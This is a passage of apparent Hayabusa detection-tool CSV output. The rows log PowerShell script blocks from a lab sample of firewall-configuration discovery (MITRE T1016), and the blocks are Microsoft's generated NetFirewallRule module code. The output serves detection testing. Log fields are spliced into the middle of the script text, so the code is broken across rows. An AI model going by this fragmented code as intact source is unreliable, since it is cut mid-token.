[Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetFirewallRule' function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(Par",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 